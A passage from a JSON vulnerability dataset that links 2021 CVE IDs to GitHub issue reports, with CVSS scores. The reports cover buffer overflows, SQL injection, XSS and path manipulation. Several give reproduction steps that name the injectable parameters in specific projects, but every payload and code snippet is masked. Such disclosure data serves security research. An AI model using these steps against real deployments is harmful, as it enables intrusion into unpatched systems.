  73012. "Issue_Url_old": "https://github.com/AlquistManager/alquist/issues/42",
  73013. "Issue_Url_new": "https://github.com/alquistmanager/alquist/issues/42",
  73014. "Repo_new": "alquistmanager/alquist",
  73015. "Issue_Created_At": "2021-09-22T20:04:48Z",
  73016. "description": "FILETAG",
  73017. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73018. "severity": "HIGH",
  73019. "baseScore": 7.5,
  73020. "impactScore": 3.6,
  73021. "exploitabilityScore": 3.9
  73022. },
  73023. {
  73024. "CVE_ID": "CVE-2021-43493",
  73025. "Issue_Url_old": "https://github.com/cksgf/ServerManagement/issues/21",
  73026. "Issue_Url_new": "https://github.com/cksgf/servermanagement/issues/21",
  73027. "Repo_new": "cksgf/servermanagement",
  73028. "Issue_Created_At": "2021-09-22T23:11:43Z",
  73029. "description": "FILETAG",
  73030. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73031. "severity": "HIGH",
  73032. "baseScore": 7.5,
  73033. "impactScore": 3.6,
  73034. "exploitabilityScore": 3.9
  73035. },
  73036. {
  73037. "CVE_ID": "CVE-2021-43494",
  73038. "Issue_Url_old": "https://github.com/codingforentrepreneurs/OpenCV-REST-API/issues/2",
  73039. "Issue_Url_new": "https://github.com/codingforentrepreneurs/opencv-rest-api/issues/2",
  73040. "Repo_new": "codingforentrepreneurs/opencv-rest-api",
  73041. "Issue_Created_At": "2021-09-22T22:50:48Z",
  73042. "description": "FILETAG",
  73043. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73044. "severity": "HIGH",
  73045. "baseScore": 7.5,
  73046. "impactScore": 3.6,
  73047. "exploitabilityScore": 3.9
  73048. },
  73049. {
  73050. "CVE_ID": "CVE-2021-43495",
  73051. "Issue_Url_old": "https://github.com/AlquistManager/alquist/issues/43",
  73052. "Issue_Url_new": "https://github.com/alquistmanager/alquist/issues/43",
  73053. "Repo_new": "alquistmanager/alquist",
  73054. "Issue_Created_At": "2021-09-22T22:32:57Z",
  73055. "description": "FILETAG",
  73056. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73057. "severity": "HIGH",
  73058. "baseScore": 7.5,
  73059. "impactScore": 3.6,
  73060. "exploitabilityScore": 3.9
  73061. },
  73062. {
  73063. "CVE_ID": "CVE-2021-43496",
  73064. "Issue_Url_old": "https://github.com/varun-suresh/Clustering/issues/12",
  73065. "Issue_Url_new": "https://github.com/varun-suresh/clustering/issues/12",
  73066. "Repo_new": "varun-suresh/clustering",
  73067. "Issue_Created_At": "2021-09-22T22:24:23Z",
  73068. "description": "FILETAG",
  73069. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  73070. "severity": "HIGH",
  73071. "baseScore": 7.5,
  73072. "impactScore": 3.6,
  73073. "exploitabilityScore": 3.9
  73074. },
  73075. {
  73076. "CVE_ID": "CVE-2021-43521",
  73077. "Issue_Url_old": "https://github.com/HardySimpson/zlog/issues/206",
  73078. "Issue_Url_new": "https://github.com/hardysimpson/zlog/issues/206",
  73079. "Repo_new": "hardysimpson/zlog",
  73080. "Issue_Created_At": "2021-11-03T09:30:35Z",
  73081. "description": "stack buffer overflow at zlog_conf_build_with_file . Hi, I found a stack buffer overflow at zlog_conf_build_with_file PATHTAG Here is the stack backtrace: ERRORTAG Of course , I byte read overflow is not important. But you can see, \"p\" It will read the memory that is underflow the \"line\" buffer. If there is exactly NUMBERTAG or NUMBERTAG or anthiny that means \"space\", \"p\" will go on move and the next \"p++\" will cause a write overflow. That is really a bug. Sepecally, I think the byte read overflow is like an address. So , there will be a crash or other wired things. If I'm right? If you need the crash case you can tell me.",
  73082. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  73083. "severity": "HIGH",
  73084. "baseScore": 7.5,
  73085. "impactScore": 3.6,
  73086. "exploitabilityScore": 3.9
  73087. },
  73088. {
  73089. "CVE_ID": "CVE-2021-43579",
  73090. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/453",
  73091. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/453",
  73092. "Repo_new": "michaelrsweet/htmldoc",
  73093. "Issue_Created_At": "2021-11-04T15:10:19Z",
  73094. "description": "Stack buffer overflow in APITAG In APITAG , the APITAG variable is read from the BMP file header and directly used to read into a fixed size buffer. CODETAG A maliciously crafted BMP file could set the APITAG variable to a number big enough to overflow the stack and thus the return address. I am attaching a proof of concept below. It can be tested with: APITAG FILETAG",
  73095. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  73096. "severity": "HIGH",
  73097. "baseScore": 7.8,
  73098. "impactScore": 5.9,
  73099. "exploitabilityScore": 1.8
  73100. },
  73101. {
  73102. "CVE_ID": "CVE-2021-43579",
  73103. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/456",
  73104. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/456",
  73105. "Repo_new": "michaelrsweet/htmldoc",
  73106. "Issue_Created_At": "2021-12-11T09:15:18Z",
  73107. "description": "Stack Buffer Overflow with BMP files Version NUMBERTAG The fix for the issue FILETAG does not completely protect against a stack buffer overflow in APITAG . It is possible to control the read in buffer colormap through the APITAG variable. The previous fix does not mitigate the issue as the APITAG is an integer , therefore, regardless of the ERRORTAG return of APITAG the buffer can be overflowed. CODETAG As an example, if APITAG is APITAG the if statement validates the variable and leads to a buffer overflow. Impact This buffer overflow can lead to modifying the instruction pointer and can therefore lead to remote code execution. FILETAG POC: FILETAG",
  73108. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  73109. "severity": "HIGH",
  73110. "baseScore": 7.8,
  73111. "impactScore": 5.9,
  73112. "exploitabilityScore": 1.8
  73113. },
  73114. {
  73115. "CVE_ID": "CVE-2021-43616",
  73116. "Issue_Url_old": "https://github.com/npm/cli/issues/2701",
  73117. "Issue_Url_new": "https://github.com/npm/cli/issues/2701",
  73118. "Repo_new": "npm/cli",
  73119. "Issue_Created_At": "2021-02-15T03:57:16Z",
  73120. "description": "[BUG] npm ci succeeds when APITAG doesn't match APITAG . Current Behavior: npm ci does not fail when APITAG doesn't match APITAG Expected Behavior: npm ci refuses to install when the lock file is invalid. Steps To Reproduce NUMBERTAG Manually bump a major version of a dependency in APITAG NUMBERTAG Run npm ci NUMBERTAG It should fail but performs the whole installation npm MENTIONTAG APITAG npm MENTIONTAG APITAG Environment: OS: Mac OS Node NUMBERTAG npm NUMBERTAG",
  73121. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73122. "severity": "CRITICAL",
  73123. "baseScore": 9.8,
  73124. "impactScore": 5.9,
  73125. "exploitabilityScore": 3.9
  73126. },
  73127. {
  73128. "CVE_ID": "CVE-2021-43620",
  73129. "Issue_Url_old": "https://github.com/nvzqz/fruity/issues/14",
  73130. "Issue_Url_new": "https://github.com/nvzqz/fruity/issues/14",
  73131. "Repo_new": "nvzqz/fruity",
  73132. "Issue_Created_At": "2021-10-31T23:36:20Z",
  73133. "description": "Display for APITAG truncates at null bytes. This issue was originally reported privately, but I thought I should create an issue to inform others about it, as it has not yet been fixed. The implementation of FILETAG for FILETAG truncates at null bytes, since it uses APITAG URLTAG . It should be possible to use APITAG URLTAG and APITAG URLTAG instead to create the complete string. Example: APITAG That example only prints the string \"null\". Since APITAG URLTAG uses FILETAG to create strings, it has the same issue. APITAG URLTAG and APITAG URLTAG also have the same issue. If you believe this is a valid issue, I encourage you to file a security advisory at URLTAG including a patch version if it is possible to release within two weeks. Thank you for your work on this crate. Creating a security advisory is not meant to be anything other than a way to provide information to other users.",
  73134. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  73135. "severity": "HIGH",
  73136. "baseScore": 7.5,
  73137. "impactScore": 3.6,
  73138. "exploitabilityScore": 3.9
  73139. },
  73140. {
  73141. "CVE_ID": "CVE-2021-43628",
  73142. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/2",
  73143. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/2",
  73144. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  73145. "Issue_Created_At": "2021-11-08T04:40:11Z",
  73146. "description": "SQL Injection vulnerability via the \"email\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Steps to reproduce NUMBERTAG Go to Staff Login page NUMBERTAG Input username , password and choose Admin in the User Type NUMBERTAG Click on the Login button NUMBERTAG Intercept the request and insert the payload in the value of the email parameter. Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG FILETAG FILETAG Remediation Validate input of email parameter in APITAG .",
  73147. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73148. "severity": "CRITICAL",
  73149. "baseScore": 9.8,
  73150. "impactScore": 5.9,
  73151. "exploitabilityScore": 3.9
  73152. },
  73153. {
  73154. "CVE_ID": "CVE-2021-43629",
  73155. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/3",
  73156. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/3",
  73157. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  73158. "Issue_Created_At": "2021-11-08T09:53:16Z",
  73159. "description": "SQL Injection vulnerability via multiple parameters in FILETAG . Author APITAG ( APITAG Version NUMBERTAG ulnerable parameters Staff Registration: afullname aemail apassword Doctor Registration: dfullname demail dpassword APITAG Delete Clerks: APITAG Delete Doctor: APITAG Steps to reproduce NUMBERTAG Go to Staff Login page NUMBERTAG Login with User Type = Admin NUMBERTAG Input personal information in the form NUMBERTAG Click on the Register button NUMBERTAG Intercept the request and insert the payload in the value of parameters. Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG FILETAG Register function URLTAG FILETAG Delete function URLTAG FILETAG Remediation Validate input of all vulnerable parameters in APITAG .",
  73160. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73161. "severity": "CRITICAL",
  73162. "baseScore": 9.8,
  73163. "impactScore": 5.9,
  73164. "exploitabilityScore": 3.9
  73165. },
  73166. {
  73167. "CVE_ID": "CVE-2021-43630",
  73168. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/4",
  73169. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/4",
  73170. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  73171. "Issue_Created_At": "2021-11-08T13:16:26Z",
  73172. "description": "SQL Injection vulnerability via multiple parameters in FILETAG . Author APITAG ( APITAG Version NUMBERTAG ulnerable parameters apfullname apphone_no apaddress APITAG APITAG Steps to reproduce NUMBERTAG Login to your patient account NUMBERTAG On the next patient page, enter personal information into the form NUMBERTAG Click on the Submit button NUMBERTAG Intercept the request and insert the payload in the value of parameters NUMBERTAG Forward the request Example payload: APITAG Proof of concept CODETAG Response in Burpsuite FILETAG Source code review FILETAG FILETAG FILETAG FILETAG FILETAG Remediation Validate input of all vulnerable parameters in APITAG .",
  73173. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  73174. "severity": "HIGH",
  73175. "baseScore": 8.8,
  73176. "impactScore": 5.9,
  73177. "exploitabilityScore": 2.8
  73178. },
  73179. {
  73180. "CVE_ID": "CVE-2021-43631",
  73181. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/5",
  73182. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/5",
  73183. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  73184. "Issue_Created_At": "2021-11-08T14:00:14Z",
  73185. "description": "SQL Injection vulnerability via \"appointment_no\" parameter in FILETAG . Author APITAG ( APITAG Version NUMBERTAG Steps to reproduce NUMBERTAG Go to Staff Login page NUMBERTAG Login with User Type = Clerk NUMBERTAG In the All Appointments page, click on a record in the list NUMBERTAG Intercept the request and insert the payload in the value of the APITAG parameter NUMBERTAG Forward the request Example payloads: Boolean based ERRORTAG Time based APITAG UNION based ERRORTAG Proof of concept ERRORTAG Response in Burpsuite Time based FILETAG UNION based FILETAG Source code review FILETAG FILETAG FILETAG FILETAG Remediation Validate input of the APITAG parameter in APITAG .",
  73186. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73187. "severity": "CRITICAL",
  73188. "baseScore": 9.8,
  73189. "impactScore": 5.9,
  73190. "exploitabilityScore": 3.9
  73191. },
  73192. {
  73193. "CVE_ID": "CVE-2021-43635",
  73194. "Issue_Url_old": "https://github.com/jcv8000/Codex/issues/8",
  73195. "Issue_Url_new": "https://github.com/jcv8000/codex/issues/8",
  73196. "Repo_new": "jcv8000/codex",
  73197. "Issue_Created_At": "2021-09-10T09:06:09Z",
  73198. "description": "Code Execution vulnerability on Codex. Issue Cross site scripting(XSS) on Codex APITAG name lead to code execution. Reproduction NUMBERTAG Open Code NUMBERTAG Create new Notebook NUMBERTAG Insert payload on the Notebook(or page) name field On Mac APITAG test APITAG On Windows APITAG test APITAG NUMBERTAG Once you move your mouse over the link \"test\" , Calculator will be opened. APITAG Mitigation Disable APITAG",
  73199. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73200. "severity": "MEDIUM",
  73201. "baseScore": 6.1,
  73202. "impactScore": 2.7,
  73203. "exploitabilityScore": 2.8
  73204. },
  73205. {
  73206. "CVE_ID": "CVE-2021-43659",
  73207. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/1522",
  73208. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/1522",
  73209. "Repo_new": "halo-dev/halo",
  73210. "Issue_Created_At": "2021-11-09T07:20:53Z",
  73211. "description": "Arbitrary file upload in the backend could cause a stored XSS vulnerability.. What is version of Halo has the issue NUMBERTAG What database are you using? Other What is your deployment method? Fat Jar Your site address. _No response_ What happened? At the function point of uploading the avatar, any file can be uploaded, such as uploading an HTML file, which will cause a stored XSS vulnerability. the file upload function points. APITAG upload HTML file, show success. APITAG access the HTML file, you can see that it is parsed by the browser. APITAG If you upload malicious XSS code, you will get the user's token, like this Payload CODETAG FILETAG APITAG Analyzing the code, it can be seen that all suffixes can be uploaded, and there is no restriction on the suffix name of the file APITAG Its recommended to only allow the parameter extension to be FILETAG or other image suffixes APITAG Relevant log output _No response_ Additional information _No response_",
  73212. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  73213. "severity": "MEDIUM",
  73214. "baseScore": 5.4,
  73215. "impactScore": 2.7,
  73216. "exploitabilityScore": 2.3
  73217. },
  73218. {
  73219. "CVE_ID": "CVE-2021-43666",
  73220. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/5136",
  73221. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/5136",
  73222. "Repo_new": "mbed-tls/mbedtls",
  73223. "Issue_Created_At": "2021-11-08T06:19:02Z",
  73224. "description": "APITAG can't exit when the input password length is NUMBERTAG Summary I am using APITAG The testfile is as follows: CODETAG The program keeps running that cannot exit. Neither result nor error is given. Expected behavior Exit with a result, or an error code if not supported. Actual behavior The function does not exit.",
  73225. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  73226. "severity": "HIGH",
  73227. "baseScore": 7.5,
  73228. "impactScore": 3.6,
  73229. "exploitabilityScore": 3.9
  73230. },
  73231. {
  73232. "CVE_ID": "CVE-2021-43668",
  73233. "Issue_Url_old": "https://github.com/ethereum/go-ethereum/issues/23866",
  73234. "Issue_Url_new": "https://github.com/ethereum/go-ethereum/issues/23866",
  73235. "Repo_new": "ethereum/go-ethereum",
  73236. "Issue_Created_At": "2021-11-08T06:39:09Z",
  73237. "description": "Nodes crash down after receiving a serial of messages generated by fuzzer, and cannot be recovered. System information Geth version: ERRORTAG OS & Version: APITAG Network: Private test net Expected behaviour Node sync block in the private net. Actual behaviour Node crashed down with \"runtime error: invalid memory address or nil pointer dereference\" Steps to reproduce the behaviour NUMBERTAG setup a NUMBERTAG node private geth nodes lcoally NUMBERTAG setup a fuzzing node continually sending fuzzed messages to other NUMBERTAG normal geth nodes NUMBERTAG After more than NUMBERTAG hours fuzzing experiment, one of the geth node who is run in fast mode crashed down. The running command for the node is CODETAG ERRORTAG When submitting logs: please submit them as text and not screenshots.",
  73238. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  73239. "severity": "MEDIUM",
  73240. "baseScore": 5.5,
  73241. "impactScore": 3.6,
  73242. "exploitabilityScore": 1.8
  73243. },
  73244. {
  73245. "CVE_ID": "CVE-2021-43668",
  73246. "Issue_Url_old": "https://github.com/syndtr/goleveldb/issues/373",
  73247. "Issue_Url_new": "https://github.com/syndtr/goleveldb/issues/373",
  73248. "Repo_new": "syndtr/goleveldb",
  73249. "Issue_Created_At": "2021-09-23T05:55:20Z",
  73250. "description": "Nil pointer in leveldb. Hi, recently we received an issue report in Go ethereum project, it's a leveldb relevant panic because of nil pointer. The version we used is APITAG The original stack trace can be found here. ERRORTAG",
  73251. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  73252. "severity": "MEDIUM",
  73253. "baseScore": 5.5,
  73254. "impactScore": 3.6,
  73255. "exploitabilityScore": 1.8
  73256. },
  73257. {
  73258. "CVE_ID": "CVE-2021-43673",
  73259. "Issue_Url_old": "https://github.com/zyx0814/dzzoffice/issues/188",
  73260. "Issue_Url_new": "https://github.com/zyx0814/dzzoffice/issues/188",
  73261. "Repo_new": "zyx0814/dzzoffice",
  73262. "Issue_Created_At": "2021-05-14T19:23:58Z",
  73263. "description": "Possible XSS vulnerability . Hello, I would to report for a possible XSS vulnerability. In file APITAG ERRORTAG",
  73264. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73265. "severity": "MEDIUM",
  73266. "baseScore": 6.1,
  73267. "impactScore": 2.7,
  73268. "exploitabilityScore": 2.8
  73269. },
  73270. {
  73271. "CVE_ID": "CVE-2021-43674",
  73272. "Issue_Url_old": "https://github.com/ThinkUpLLC/ThinkUp/issues/2289",
  73273. "Issue_Url_new": "https://github.com/thinkupllc/thinkup/issues/2289",
  73274. "Repo_new": "thinkupllc/thinkup",
  73275. "Issue_Created_At": "2021-11-10T12:15:33Z",
  73276. "description": "Possible Path manipulation vulnerability. Hello, I would like to report for path manipulation vulnerability. The path of the vulnrability: File APITAG line NUMBERTAG ERRORTAG File APITAG cache APITAG ERRORTAG File APITAG ERRORTAG File APITAG CODETAG",
  73277. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73278. "severity": "CRITICAL",
  73279. "baseScore": 9.8,
  73280. "impactScore": 5.9,
  73281. "exploitabilityScore": 3.9
  73282. },
  73283. {
  73284. "CVE_ID": "CVE-2021-43676",
  73285. "Issue_Url_old": "https://github.com/matyhtf/framework/issues/206",
  73286. "Issue_Url_new": "https://github.com/matyhtf/framework/issues/206",
  73287. "Repo_new": "matyhtf/framework",
  73288. "Issue_Created_At": "2021-05-13T17:58:26Z",
  73289. "description": "Possible path manipulation vulnerability. Hello, I would like to report for a path manipulation vulnerability. File FILETAG line NUMBERTAG ERRORTAG File FILETAG ERRORTAG File FILETAG ERRORTAG File FILETAG ERRORTAG",
  73290. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73291. "severity": "CRITICAL",
  73292. "baseScore": 9.8,
  73293. "impactScore": 5.9,
  73294. "exploitabilityScore": 3.9
  73295. },
  73296. {
  73297. "CVE_ID": "CVE-2021-43678",
  73298. "Issue_Url_old": "https://github.com/gaoming13/wechat-php-sdk/issues/30",
  73299. "Issue_Url_new": "https://github.com/gaoming13/wechat-php-sdk/issues/30",
  73300. "Repo_new": "gaoming13/wechat-php-sdk",
  73301. "Issue_Created_At": "2021-11-11T13:57:38Z",
  73302. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. Vulnerability path File FILETAG Line NUMBERTAG ERRORTAG Line NUMBERTAG ERRORTAG Line NUMBERTAG ERRORTAG",
  73303. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73304. "severity": "MEDIUM",
  73305. "baseScore": 6.1,
  73306. "impactScore": 2.7,
  73307. "exploitabilityScore": 2.8
  73308. },
  73309. {
  73310. "CVE_ID": "CVE-2021-43679",
  73311. "Issue_Url_old": "https://github.com/shopex/ecshop/issues/4",
  73312. "Issue_Url_new": "https://github.com/shopex/ecshop/issues/4",
  73313. "Repo_new": "shopex/ecshop",
  73314. "Issue_Created_At": "2021-11-11T15:27:51Z",
  73315. "description": "Possible SQL injection vulnerability. Hello, I would like to report for SQLI vulnerability. Vulnerability path File PATHTAG APITAG File PATHTAG ERRORTAG File PATHTAG ERRORTAG File PATHTAG ERRORTAG",
  73316. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73317. "severity": "CRITICAL",
  73318. "baseScore": 9.8,
  73319. "impactScore": 5.9,
  73320. "exploitabilityScore": 3.9
  73321. },
  73322. {
  73323. "CVE_ID": "CVE-2021-43681",
  73324. "Issue_Url_old": "https://github.com/ZeroDream-CN/SakuraPanel/issues/23",
  73325. "Issue_Url_new": "https://github.com/zerodream-cn/sakurapanel/issues/23",
  73326. "Repo_new": "zerodream-cn/sakurapanel",
  73327. "Issue_Created_At": "2021-11-11T16:17:30Z",
  73328. "description": "Possible XSS vulnerability . Hello, I would like to report for XSS vulnerability. In file FILETAG line NUMBERTAG APITAG In function APITAG ERRORTAG line NUMBERTAG APITAG exit will terminate the script and print the message which have the value $data['proxy_name']. Then there is XSS vulnerability",
  73329. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73330. "severity": "MEDIUM",
  73331. "baseScore": 6.1,
  73332. "impactScore": 2.7,
  73333. "exploitabilityScore": 2.8
  73334. },
  73335. {
  73336. "CVE_ID": "CVE-2021-43682",
  73337. "Issue_Url_old": "https://github.com/baijunyao/thinkphp-bjyblog/issues/6",
  73338. "Issue_Url_new": "https://github.com/baijunyao/thinkphp-bjyblog/issues/6",
  73339. "Repo_new": "baijunyao/thinkphp-bjyblog",
  73340. "Issue_Created_At": "2021-11-11T16:39:45Z",
  73341. "description": "Possible XSS vulnerability. Hello, I would like to report XSS vulnerability. In file FILETAG line NUMBERTAG APITAG In file FILETAG line NUMBERTAG function U APITAG function U APITAG function redirect CODETAG exit function will terminate the script and print the message to the user which has $_SERVER['HTTP_HOST']. Then there is XSS vulnerability.",
  73342. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73343. "severity": "MEDIUM",
  73344. "baseScore": 6.1,
  73345. "impactScore": 2.7,
  73346. "exploitabilityScore": 2.8
  73347. },
  73348. {
  73349. "CVE_ID": "CVE-2021-43683",
  73350. "Issue_Url_old": "https://github.com/HaschekSolutions/pictshare/issues/133",
  73351. "Issue_Url_new": "https://github.com/hascheksolutions/pictshare/issues/133",
  73352. "Repo_new": "hascheksolutions/pictshare",
  73353. "Issue_Created_At": "2021-11-11T17:03:54Z",
  73354. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. in FILETAG function APITAG ERRORTAG line NUMBERTAG CODETAG exit function will terminate the script and print the message which has $_REQUEST['hash']. Then there is XSS vulnerability.",
  73355. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73356. "severity": "MEDIUM",
  73357. "baseScore": 6.1,
  73358. "impactScore": 2.7,
  73359. "exploitabilityScore": 2.8
  73360. },
  73361. {
  73362. "CVE_ID": "CVE-2021-43685",
  73363. "Issue_Url_old": "https://github.com/LibreTime/libretime/issues/1437",
  73364. "Issue_Url_new": "https://github.com/libretime/libretime/issues/1760",
  73365. "Repo_new": "libretime/libretime",
  73366. "Issue_Created_At": "2021-11-11T18:10:07Z",
  73367. "description": "Possible path manipulation vulnerability. Hello, I would like to report for path manipulation vulnerability. The path of the vulnerability. In file FILETAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG In file FILETAG line NUMBERTAG ERRORTAG In file FILETAG line NUMBERTAG APITAG line NUMBERTAG ERRORTAG",
  73368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73369. "severity": "CRITICAL",
  73370. "baseScore": 9.8,
  73371. "impactScore": 5.9,
  73372. "exploitabilityScore": 3.9
  73373. },
  73374. {
  73375. "CVE_ID": "CVE-2021-43686",
  73376. "Issue_Url_old": "https://github.com/nZEDb/nZEDb/issues/2659",
  73377. "Issue_Url_new": "https://github.com/nzedb/nzedb/issues/2659",
  73378. "Repo_new": "nzedb/nzedb",
  73379. "Issue_Created_At": "2021-11-12T15:10:52Z",
  73380. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. The path of the vulnerability file PATHTAG line NUMBERTAG ERRORTAG file PATHTAG in line NUMBERTAG ERRORTAG exit function will terminate the script and print the message which has the input $_GET['t']. Then there is XSS vulnerability.",
  73381. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73382. "severity": "MEDIUM",
  73383. "baseScore": 6.1,
  73384. "impactScore": 2.7,
  73385. "exploitabilityScore": 2.8
  73386. },
  73387. {
  73388. "CVE_ID": "CVE-2021-43689",
  73389. "Issue_Url_old": "https://github.com/yicenburan/manage/issues/2",
  73390. "Issue_Url_new": "https://github.com/yicenburan/manage/issues/2",
  73391. "Repo_new": "yicenburan/manage",
  73392. "Issue_Created_At": "2021-11-12T21:31:27Z",
  73393. "description": "Possible XSS vilnerability. Hello, I would like to report to XSS vulnerability. The path of the vulnerability. In file PATHTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG line NUMBERTAG ERRORTAG In file PATHTAG line NUMBERTAG ERRORTAG exit function will terminate the script and print a message to the user. Then there is XSS vulnerability because it contains values from $_POST.",
  73394. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73395. "severity": "MEDIUM",
  73396. "baseScore": 6.1,
  73397. "impactScore": 2.7,
  73398. "exploitabilityScore": 2.8
  73399. },
  73400. {
  73401. "CVE_ID": "CVE-2021-43690",
  73402. "Issue_Url_old": "https://github.com/Yurunsoft/YurunProxy/issues/3",
  73403. "Issue_Url_new": "https://github.com/yurunsoft/yurunproxy/issues/3",
  73404. "Repo_new": "yurunsoft/yurunproxy",
  73405. "Issue_Created_At": "2021-11-13T17:22:16Z",
  73406. "description": "Possible XSS vulnerability. Hello, I would like to report to XSS vulnerability. The path. In file FILETAG line NUMBERTAG CODETAG In file FILETAG line NUMBERTAG ERRORTAG In file FILETAG line NUMBERTAG ERRORTAG Exit function will terminate the script and print a message which have values from the socket_read. Which will lead to XSS vulnerability.",
  73407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73408. "severity": "MEDIUM",
  73409. "baseScore": 6.1,
  73410. "impactScore": 2.7,
  73411. "exploitabilityScore": 2.8
  73412. },
  73413. {
  73414. "CVE_ID": "CVE-2021-43691",
  73415. "Issue_Url_old": "https://github.com/toocool/tripexpress/issues/40",
  73416. "Issue_Url_new": "https://github.com/toocool/tripexpress/issues/40",
  73417. "Repo_new": "toocool/tripexpress",
  73418. "Issue_Created_At": "2021-11-13T17:44:22Z",
  73419. "description": "Possible path manipulation vulnerability. Hello, I would like to report for path manipulation vulnerability. The path of the vulnerability. In file PATHTAG APITAG line NUMBERTAG ERRORTAG The variable src is coming from $_SERVER[\"argv\"]. Then there is path manipulation vulnerability.",
  73420. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  73421. "severity": "CRITICAL",
  73422. "baseScore": 9.8,
  73423. "impactScore": 5.9,
  73424. "exploitabilityScore": 3.9
  73425. },
  73426. {
  73427. "CVE_ID": "CVE-2021-43692",
  73428. "Issue_Url_old": "https://github.com/zxq2233/youtube-php-mirroring/issues/3",
  73429. "Issue_Url_new": "https://github.com/zxq2233/youtube-php-mirroring/issues/3",
  73430. "Repo_new": "zxq2233/youtube-php-mirroring",
  73431. "Issue_Created_At": "2021-11-13T18:06:33Z",
  73432. "description": "Possible XSS vulnerability. Hello, I would like to report for XSS vulnerability. The path of the vulnerability: In file FILETAG ERRORTAG In file PATHTAG line NUMBERTAG ERRORTAG In file PATHTAG line NUMBERTAG ERRORTAG",
  73433. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  73434. "severity": "MEDIUM",
  73435. "baseScore": 6.1,
  73436. "impactScore": 2.7,
  73437. "exploitabilityScore": 2.8
  73438. },
  73439. {
  73440. "CVE_ID": "CVE-2021-43693",
